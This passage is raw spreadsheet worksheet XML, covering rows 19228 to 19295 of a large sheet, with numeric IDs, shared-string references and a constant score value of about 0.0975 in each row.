        <v>1.0</v>
      </c>
      <c r="E19228" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19228" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19229" ht="15.75" customHeight="1">
      <c r="A19229" s="1">
        <v>19187.0</v>
      </c>
      <c r="B19229" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C19229" s="2" t="s">
        <v>18535</v>
      </c>
      <c r="D19229" s="2">
        <v>1.0</v>
      </c>
      <c r="E19229" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19229" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19230" ht="15.75" customHeight="1">
      <c r="A19230" s="1">
        <v>19338.0</v>
      </c>
      <c r="B19230" s="2">
        <v>5.535027E7</v>
      </c>
      <c r="C19230" s="2" t="s">
        <v>18536</v>
      </c>
      <c r="D19230" s="2">
        <v>1.0</v>
      </c>
      <c r="E19230" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19230" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19231" ht="15.75" customHeight="1">
      <c r="A19231" s="1">
        <v>19408.0</v>
      </c>
      <c r="B19231" s="2">
        <v>5.5593222E7</v>
      </c>
      <c r="C19231" s="2" t="s">
        <v>18537</v>
      </c>
      <c r="D19231" s="2">
        <v>1.0</v>
      </c>
      <c r="E19231" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19231" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19232" ht="15.75" customHeight="1">
      <c r="A19232" s="1">
        <v>19782.0</v>
      </c>
      <c r="B19232" s="2">
        <v>5.6795871E7</v>
      </c>
      <c r="C19232" s="2" t="s">
        <v>18538</v>
      </c>
      <c r="D19232" s="2">
        <v>1.0</v>
      </c>
      <c r="E19232" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19232" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19233" ht="15.75" customHeight="1">
      <c r="A19233" s="1">
        <v>19976.0</v>
      </c>
      <c r="B19233" s="2">
        <v>5.7597839E7</v>
      </c>
      <c r="C19233" s="2" t="s">
        <v>18539</v>
      </c>
      <c r="D19233" s="2">
        <v>1.0</v>
      </c>
      <c r="E19233" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19233" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19234" ht="15.75" customHeight="1">
      <c r="A19234" s="1">
        <v>20037.0</v>
      </c>
      <c r="B19234" s="2">
        <v>7320667.0</v>
      </c>
      <c r="C19234" s="2" t="s">
        <v>18540</v>
      </c>
      <c r="D19234" s="2">
        <v>1.0</v>
      </c>
      <c r="E19234" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19234" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19235" ht="15.75" customHeight="1">
      <c r="A19235" s="1">
        <v>20095.0</v>
      </c>
      <c r="B19235" s="2">
        <v>9650680.0</v>
      </c>
      <c r="C19235" s="2" t="s">
        <v>18541</v>
      </c>
      <c r="D19235" s="2">
        <v>1.0</v>
      </c>
      <c r="E19235" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19235" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19236" ht="15.75" customHeight="1">
      <c r="A19236" s="1">
        <v>20382.0</v>
      </c>
      <c r="B19236" s="2">
        <v>1.1962447E7</v>
      </c>
      <c r="C19236" s="2" t="s">
        <v>18542</v>
      </c>
      <c r="D19236" s="2">
        <v>1.0</v>
      </c>
      <c r="E19236" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19236" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19237" ht="15.75" customHeight="1">
      <c r="A19237" s="1">
        <v>20529.0</v>
      </c>
      <c r="B19237" s="2">
        <v>1.3174672E7</v>
      </c>
      <c r="C19237" s="2" t="s">
        <v>18543</v>
      </c>
      <c r="D19237" s="2">
        <v>1.0</v>
      </c>
      <c r="E19237" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19237" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19238" ht="15.75" customHeight="1">
      <c r="A19238" s="1">
        <v>20537.0</v>
      </c>
      <c r="B19238" s="2">
        <v>1.328887E7</v>
      </c>
      <c r="C19238" s="2" t="s">
        <v>18544</v>
      </c>
      <c r="D19238" s="2">
        <v>1.0</v>
      </c>
      <c r="E19238" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19238" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19239" ht="15.75" customHeight="1">
      <c r="A19239" s="1">
        <v>20584.0</v>
      </c>
      <c r="B19239" s="2">
        <v>1.3707848E7</v>
      </c>
      <c r="C19239" s="2" t="s">
        <v>18545</v>
      </c>
      <c r="D19239" s="2">
        <v>1.0</v>
      </c>
      <c r="E19239" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19239" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19240" ht="15.75" customHeight="1">
      <c r="A19240" s="1">
        <v>20631.0</v>
      </c>
      <c r="B19240" s="2">
        <v>1.4143797E7</v>
      </c>
      <c r="C19240" s="2" t="s">
        <v>18546</v>
      </c>
      <c r="D19240" s="2">
        <v>1.0</v>
      </c>
      <c r="E19240" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19240" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19241" ht="15.75" customHeight="1">
      <c r="A19241" s="1">
        <v>20658.0</v>
      </c>
      <c r="B19241" s="2">
        <v>1.4280845E7</v>
      </c>
      <c r="C19241" s="2" t="s">
        <v>18547</v>
      </c>
      <c r="D19241" s="2">
        <v>1.0</v>
      </c>
      <c r="E19241" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19241" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19242" ht="15.75" customHeight="1">
      <c r="A19242" s="1">
        <v>20887.0</v>
      </c>
      <c r="B19242" s="2">
        <v>1.6097965E7</v>
      </c>
      <c r="C19242" s="2" t="s">
        <v>18548</v>
      </c>
      <c r="D19242" s="2">
        <v>1.0</v>
      </c>
      <c r="E19242" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19242" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19243" ht="15.75" customHeight="1">
      <c r="A19243" s="1">
        <v>21096.0</v>
      </c>
      <c r="B19243" s="2">
        <v>1.8075694E7</v>
      </c>
      <c r="C19243" s="2" t="s">
        <v>18549</v>
      </c>
      <c r="D19243" s="2">
        <v>1.0</v>
      </c>
      <c r="E19243" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19243" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19244" ht="15.75" customHeight="1">
      <c r="A19244" s="1">
        <v>21165.0</v>
      </c>
      <c r="B19244" s="2">
        <v>1.9009348E7</v>
      </c>
      <c r="C19244" s="2" t="s">
        <v>18550</v>
      </c>
      <c r="D19244" s="2">
        <v>1.0</v>
      </c>
      <c r="E19244" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19244" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19245" ht="15.75" customHeight="1">
      <c r="A19245" s="1">
        <v>21427.0</v>
      </c>
      <c r="B19245" s="2">
        <v>2.211595E7</v>
      </c>
      <c r="C19245" s="2" t="s">
        <v>18551</v>
      </c>
      <c r="D19245" s="2">
        <v>1.0</v>
      </c>
      <c r="E19245" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19245" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19246" ht="15.75" customHeight="1">
      <c r="A19246" s="1">
        <v>21664.0</v>
      </c>
      <c r="B19246" s="2">
        <v>2.5006497E7</v>
      </c>
      <c r="C19246" s="2" t="s">
        <v>18552</v>
      </c>
      <c r="D19246" s="2">
        <v>1.0</v>
      </c>
      <c r="E19246" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19246" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19247" ht="15.75" customHeight="1">
      <c r="A19247" s="1">
        <v>21767.0</v>
      </c>
      <c r="B19247" s="2">
        <v>2.6328991E7</v>
      </c>
      <c r="C19247" s="2" t="s">
        <v>18553</v>
      </c>
      <c r="D19247" s="2">
        <v>1.0</v>
      </c>
      <c r="E19247" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19247" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19248" ht="15.75" customHeight="1">
      <c r="A19248" s="1">
        <v>21863.0</v>
      </c>
      <c r="B19248" s="2">
        <v>2.7357569E7</v>
      </c>
      <c r="C19248" s="2" t="s">
        <v>18554</v>
      </c>
      <c r="D19248" s="2">
        <v>1.0</v>
      </c>
      <c r="E19248" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19248" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19249" ht="15.75" customHeight="1">
      <c r="A19249" s="1">
        <v>21930.0</v>
      </c>
      <c r="B19249" s="2">
        <v>2.8521825E7</v>
      </c>
      <c r="C19249" s="2" t="s">
        <v>18555</v>
      </c>
      <c r="D19249" s="2">
        <v>1.0</v>
      </c>
      <c r="E19249" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19249" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19250" ht="15.75" customHeight="1">
      <c r="A19250" s="1">
        <v>22660.0</v>
      </c>
      <c r="B19250" s="2">
        <v>4.1206686E7</v>
      </c>
      <c r="C19250" s="2" t="s">
        <v>18556</v>
      </c>
      <c r="D19250" s="2">
        <v>1.0</v>
      </c>
      <c r="E19250" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19250" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19251" ht="15.75" customHeight="1">
      <c r="A19251" s="1">
        <v>22861.0</v>
      </c>
      <c r="B19251" s="2">
        <v>4.720566E7</v>
      </c>
      <c r="C19251" s="2" t="s">
        <v>18557</v>
      </c>
      <c r="D19251" s="2">
        <v>1.0</v>
      </c>
      <c r="E19251" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19251" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19252" ht="15.75" customHeight="1">
      <c r="A19252" s="1">
        <v>22929.0</v>
      </c>
      <c r="B19252" s="2">
        <v>4.8617372E7</v>
      </c>
      <c r="C19252" s="2" t="s">
        <v>18558</v>
      </c>
      <c r="D19252" s="2">
        <v>1.0</v>
      </c>
      <c r="E19252" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19252" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19253" ht="15.75" customHeight="1">
      <c r="A19253" s="1">
        <v>23153.0</v>
      </c>
      <c r="B19253" s="2">
        <v>5.1869868E7</v>
      </c>
      <c r="C19253" s="2" t="s">
        <v>18559</v>
      </c>
      <c r="D19253" s="2">
        <v>1.0</v>
      </c>
      <c r="E19253" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19253" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19254" ht="15.75" customHeight="1">
      <c r="A19254" s="1">
        <v>23334.0</v>
      </c>
      <c r="B19254" s="2">
        <v>5.4664456E7</v>
      </c>
      <c r="C19254" s="2" t="s">
        <v>18439</v>
      </c>
      <c r="D19254" s="2">
        <v>1.0</v>
      </c>
      <c r="E19254" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19254" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19255" ht="15.75" customHeight="1">
      <c r="A19255" s="1">
        <v>23664.0</v>
      </c>
      <c r="B19255" s="2">
        <v>6838545.0</v>
      </c>
      <c r="C19255" s="2" t="s">
        <v>18560</v>
      </c>
      <c r="D19255" s="2">
        <v>1.0</v>
      </c>
      <c r="E19255" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19255" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19256" ht="15.75" customHeight="1">
      <c r="A19256" s="1">
        <v>24170.0</v>
      </c>
      <c r="B19256" s="2">
        <v>1.0202058E7</v>
      </c>
      <c r="C19256" s="2" t="s">
        <v>18561</v>
      </c>
      <c r="D19256" s="2">
        <v>1.0</v>
      </c>
      <c r="E19256" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19256" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19257" ht="15.75" customHeight="1">
      <c r="A19257" s="1">
        <v>24353.0</v>
      </c>
      <c r="B19257" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C19257" s="2" t="s">
        <v>18562</v>
      </c>
      <c r="D19257" s="2">
        <v>1.0</v>
      </c>
      <c r="E19257" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19257" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19258" ht="15.75" customHeight="1">
      <c r="A19258" s="1">
        <v>24554.0</v>
      </c>
      <c r="B19258" s="2">
        <v>1.1291047E7</v>
      </c>
      <c r="C19258" s="2" t="s">
        <v>18563</v>
      </c>
      <c r="D19258" s="2">
        <v>1.0</v>
      </c>
      <c r="E19258" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19258" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19259" ht="15.75" customHeight="1">
      <c r="A19259" s="1">
        <v>24607.0</v>
      </c>
      <c r="B19259" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C19259" s="2" t="s">
        <v>18564</v>
      </c>
      <c r="D19259" s="2">
        <v>1.0</v>
      </c>
      <c r="E19259" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19259" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19260" ht="15.75" customHeight="1">
      <c r="A19260" s="1">
        <v>24641.0</v>
      </c>
      <c r="B19260" s="2">
        <v>1.1483414E7</v>
      </c>
      <c r="C19260" s="2" t="s">
        <v>18565</v>
      </c>
      <c r="D19260" s="2">
        <v>1.0</v>
      </c>
      <c r="E19260" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19260" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19261" ht="15.75" customHeight="1">
      <c r="A19261" s="1">
        <v>24836.0</v>
      </c>
      <c r="B19261" s="2">
        <v>1.216204E7</v>
      </c>
      <c r="C19261" s="2" t="s">
        <v>18566</v>
      </c>
      <c r="D19261" s="2">
        <v>1.0</v>
      </c>
      <c r="E19261" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19261" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19262" ht="15.75" customHeight="1">
      <c r="A19262" s="1">
        <v>24929.0</v>
      </c>
      <c r="B19262" s="2">
        <v>1.24394E7</v>
      </c>
      <c r="C19262" s="2" t="s">
        <v>18567</v>
      </c>
      <c r="D19262" s="2">
        <v>1.0</v>
      </c>
      <c r="E19262" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19262" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19263" ht="15.75" customHeight="1">
      <c r="A19263" s="1">
        <v>25192.0</v>
      </c>
      <c r="B19263" s="2">
        <v>1.3174671E7</v>
      </c>
      <c r="C19263" s="2" t="s">
        <v>18543</v>
      </c>
      <c r="D19263" s="2">
        <v>1.0</v>
      </c>
      <c r="E19263" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19263" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19264" ht="15.75" customHeight="1">
      <c r="A19264" s="1">
        <v>25397.0</v>
      </c>
      <c r="B19264" s="2">
        <v>1.3707847E7</v>
      </c>
      <c r="C19264" s="2" t="s">
        <v>18545</v>
      </c>
      <c r="D19264" s="2">
        <v>1.0</v>
      </c>
      <c r="E19264" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19264" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19265" ht="15.75" customHeight="1">
      <c r="A19265" s="1">
        <v>25678.0</v>
      </c>
      <c r="B19265" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C19265" s="2" t="s">
        <v>18568</v>
      </c>
      <c r="D19265" s="2">
        <v>1.0</v>
      </c>
      <c r="E19265" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19265" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19266" ht="15.75" customHeight="1">
      <c r="A19266" s="1">
        <v>25806.0</v>
      </c>
      <c r="B19266" s="2">
        <v>1.4733692E7</v>
      </c>
      <c r="C19266" s="2" t="s">
        <v>18569</v>
      </c>
      <c r="D19266" s="2">
        <v>1.0</v>
      </c>
      <c r="E19266" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19266" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19267" ht="15.75" customHeight="1">
      <c r="A19267" s="1">
        <v>25949.0</v>
      </c>
      <c r="B19267" s="2">
        <v>1.5238696E7</v>
      </c>
      <c r="C19267" s="2" t="s">
        <v>18570</v>
      </c>
      <c r="D19267" s="2">
        <v>1.0</v>
      </c>
      <c r="E19267" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19267" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19268" ht="15.75" customHeight="1">
      <c r="A19268" s="1">
        <v>26092.0</v>
      </c>
      <c r="B19268" s="2">
        <v>1.569904E7</v>
      </c>
      <c r="C19268" s="2" t="s">
        <v>18571</v>
      </c>
      <c r="D19268" s="2">
        <v>1.0</v>
      </c>
      <c r="E19268" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19268" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19269" ht="15.75" customHeight="1">
      <c r="A19269" s="1">
        <v>26126.0</v>
      </c>
      <c r="B19269" s="2">
        <v>1.5914071E7</v>
      </c>
      <c r="C19269" s="2" t="s">
        <v>18572</v>
      </c>
      <c r="D19269" s="2">
        <v>1.0</v>
      </c>
      <c r="E19269" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19269" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19270" ht="15.75" customHeight="1">
      <c r="A19270" s="1">
        <v>26154.0</v>
      </c>
      <c r="B19270" s="2">
        <v>1.6082815E7</v>
      </c>
      <c r="C19270" s="2" t="s">
        <v>18573</v>
      </c>
      <c r="D19270" s="2">
        <v>1.0</v>
      </c>
      <c r="E19270" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19270" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19271" ht="15.75" customHeight="1">
      <c r="A19271" s="1">
        <v>26374.0</v>
      </c>
      <c r="B19271" s="2">
        <v>1.6920344E7</v>
      </c>
      <c r="C19271" s="2" t="s">
        <v>18574</v>
      </c>
      <c r="D19271" s="2">
        <v>1.0</v>
      </c>
      <c r="E19271" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19271" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19272" ht="15.75" customHeight="1">
      <c r="A19272" s="1">
        <v>26660.0</v>
      </c>
      <c r="B19272" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C19272" s="2" t="s">
        <v>18575</v>
      </c>
      <c r="D19272" s="2">
        <v>1.0</v>
      </c>
      <c r="E19272" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19272" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19273" ht="15.75" customHeight="1">
      <c r="A19273" s="1">
        <v>26800.0</v>
      </c>
      <c r="B19273" s="2">
        <v>1.864205E7</v>
      </c>
      <c r="C19273" s="2" t="s">
        <v>18576</v>
      </c>
      <c r="D19273" s="2">
        <v>1.0</v>
      </c>
      <c r="E19273" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19273" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19274" ht="15.75" customHeight="1">
      <c r="A19274" s="1">
        <v>28021.0</v>
      </c>
      <c r="B19274" s="2">
        <v>2.4380412E7</v>
      </c>
      <c r="C19274" s="2" t="s">
        <v>18577</v>
      </c>
      <c r="D19274" s="2">
        <v>1.0</v>
      </c>
      <c r="E19274" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19274" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19275" ht="15.75" customHeight="1">
      <c r="A19275" s="1">
        <v>28080.0</v>
      </c>
      <c r="B19275" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C19275" s="2" t="s">
        <v>18578</v>
      </c>
      <c r="D19275" s="2">
        <v>1.0</v>
      </c>
      <c r="E19275" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19275" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19276" ht="15.75" customHeight="1">
      <c r="A19276" s="1">
        <v>28140.0</v>
      </c>
      <c r="B19276" s="2">
        <v>2.479852E7</v>
      </c>
      <c r="C19276" s="2" t="s">
        <v>18579</v>
      </c>
      <c r="D19276" s="2">
        <v>1.0</v>
      </c>
      <c r="E19276" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19276" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19277" ht="15.75" customHeight="1">
      <c r="A19277" s="1">
        <v>28402.0</v>
      </c>
      <c r="B19277" s="2">
        <v>2.6283067E7</v>
      </c>
      <c r="C19277" s="2" t="s">
        <v>18580</v>
      </c>
      <c r="D19277" s="2">
        <v>1.0</v>
      </c>
      <c r="E19277" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19277" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19278" ht="15.75" customHeight="1">
      <c r="A19278" s="1">
        <v>28474.0</v>
      </c>
      <c r="B19278" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C19278" s="2" t="s">
        <v>18581</v>
      </c>
      <c r="D19278" s="2">
        <v>1.0</v>
      </c>
      <c r="E19278" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19278" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19279" ht="15.75" customHeight="1">
      <c r="A19279" s="1">
        <v>28493.0</v>
      </c>
      <c r="B19279" s="2">
        <v>2.6675262E7</v>
      </c>
      <c r="C19279" s="2" t="s">
        <v>18582</v>
      </c>
      <c r="D19279" s="2">
        <v>1.0</v>
      </c>
      <c r="E19279" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19279" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19280" ht="15.75" customHeight="1">
      <c r="A19280" s="1">
        <v>28536.0</v>
      </c>
      <c r="B19280" s="2">
        <v>2.6796949E7</v>
      </c>
      <c r="C19280" s="2" t="s">
        <v>18583</v>
      </c>
      <c r="D19280" s="2">
        <v>1.0</v>
      </c>
      <c r="E19280" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19280" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19281" ht="15.75" customHeight="1">
      <c r="A19281" s="1">
        <v>29506.0</v>
      </c>
      <c r="B19281" s="2">
        <v>3.2708482E7</v>
      </c>
      <c r="C19281" s="2" t="s">
        <v>18584</v>
      </c>
      <c r="D19281" s="2">
        <v>1.0</v>
      </c>
      <c r="E19281" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19281" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19282" ht="15.75" customHeight="1">
      <c r="A19282" s="1">
        <v>29535.0</v>
      </c>
      <c r="B19282" s="2">
        <v>3.283781E7</v>
      </c>
      <c r="C19282" s="2" t="s">
        <v>18585</v>
      </c>
      <c r="D19282" s="2">
        <v>1.0</v>
      </c>
      <c r="E19282" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19282" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19283" ht="15.75" customHeight="1">
      <c r="A19283" s="1">
        <v>30446.0</v>
      </c>
      <c r="B19283" s="2">
        <v>3.9244753E7</v>
      </c>
      <c r="C19283" s="2" t="s">
        <v>18586</v>
      </c>
      <c r="D19283" s="2">
        <v>1.0</v>
      </c>
      <c r="E19283" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19283" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19284" ht="15.75" customHeight="1">
      <c r="A19284" s="1">
        <v>30647.0</v>
      </c>
      <c r="B19284" s="2">
        <v>4174659.0</v>
      </c>
      <c r="C19284" s="2" t="s">
        <v>18587</v>
      </c>
      <c r="D19284" s="2">
        <v>1.0</v>
      </c>
      <c r="E19284" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19284" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19285" ht="15.75" customHeight="1">
      <c r="A19285" s="1">
        <v>30966.0</v>
      </c>
      <c r="B19285" s="2">
        <v>4.746232E7</v>
      </c>
      <c r="C19285" s="2" t="s">
        <v>18588</v>
      </c>
      <c r="D19285" s="2">
        <v>1.0</v>
      </c>
      <c r="E19285" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19285" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19286" ht="15.75" customHeight="1">
      <c r="A19286" s="1">
        <v>31132.0</v>
      </c>
      <c r="B19286" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C19286" s="2" t="s">
        <v>18429</v>
      </c>
      <c r="D19286" s="2">
        <v>1.0</v>
      </c>
      <c r="E19286" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19286" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19287" ht="15.75" customHeight="1">
      <c r="A19287" s="1">
        <v>31409.0</v>
      </c>
      <c r="B19287" s="2">
        <v>5006358.0</v>
      </c>
      <c r="C19287" s="2" t="s">
        <v>18589</v>
      </c>
      <c r="D19287" s="2">
        <v>1.0</v>
      </c>
      <c r="E19287" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19287" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19288" ht="15.75" customHeight="1">
      <c r="A19288" s="1">
        <v>31889.0</v>
      </c>
      <c r="B19288" s="2">
        <v>5286976.0</v>
      </c>
      <c r="C19288" s="2" t="s">
        <v>18590</v>
      </c>
      <c r="D19288" s="2">
        <v>1.0</v>
      </c>
      <c r="E19288" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19288" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19289" ht="15.75" customHeight="1">
      <c r="A19289" s="1">
        <v>31963.0</v>
      </c>
      <c r="B19289" s="2">
        <v>5311264.0</v>
      </c>
      <c r="C19289" s="2" t="s">
        <v>18591</v>
      </c>
      <c r="D19289" s="2">
        <v>1.0</v>
      </c>
      <c r="E19289" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19289" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19290" ht="15.75" customHeight="1">
      <c r="A19290" s="1">
        <v>32062.0</v>
      </c>
      <c r="B19290" s="2">
        <v>5379280.0</v>
      </c>
      <c r="C19290" s="2" t="s">
        <v>18592</v>
      </c>
      <c r="D19290" s="2">
        <v>1.0</v>
      </c>
      <c r="E19290" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19290" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19291" ht="15.75" customHeight="1">
      <c r="A19291" s="1">
        <v>32089.0</v>
      </c>
      <c r="B19291" s="2">
        <v>5398756.0</v>
      </c>
      <c r="C19291" s="2" t="s">
        <v>18593</v>
      </c>
      <c r="D19291" s="2">
        <v>1.0</v>
      </c>
      <c r="E19291" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19291" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19292" ht="15.75" customHeight="1">
      <c r="A19292" s="1">
        <v>32225.0</v>
      </c>
      <c r="B19292" s="2">
        <v>5488896.0</v>
      </c>
      <c r="C19292" s="2" t="s">
        <v>18594</v>
      </c>
      <c r="D19292" s="2">
        <v>1.0</v>
      </c>
      <c r="E19292" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19292" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19293" ht="15.75" customHeight="1">
      <c r="A19293" s="1">
        <v>32274.0</v>
      </c>
      <c r="B19293" s="2">
        <v>5531658.0</v>
      </c>
      <c r="C19293" s="2" t="s">
        <v>18595</v>
      </c>
      <c r="D19293" s="2">
        <v>1.0</v>
      </c>
      <c r="E19293" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19293" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19294" ht="15.75" customHeight="1">
      <c r="A19294" s="1">
        <v>32798.0</v>
      </c>
      <c r="B19294" s="2">
        <v>6151179.0</v>
      </c>
      <c r="C19294" s="2" t="s">
        <v>18596</v>
      </c>
      <c r="D19294" s="2">
        <v>1.0</v>
      </c>
      <c r="E19294" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19294" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19295" ht="15.75" customHeight="1">
      <c r="A19295" s="1">
        <v>33111.0</v>
      </c>
      <c r="B19295" s="2">
        <v>6959208.0</v>
      </c>
      <c r="C19295" s="2" t="s">
        <v>18597</v>
      </c>
      <c r="D19295" s="2">
        <v>1.0</v>
      </c>
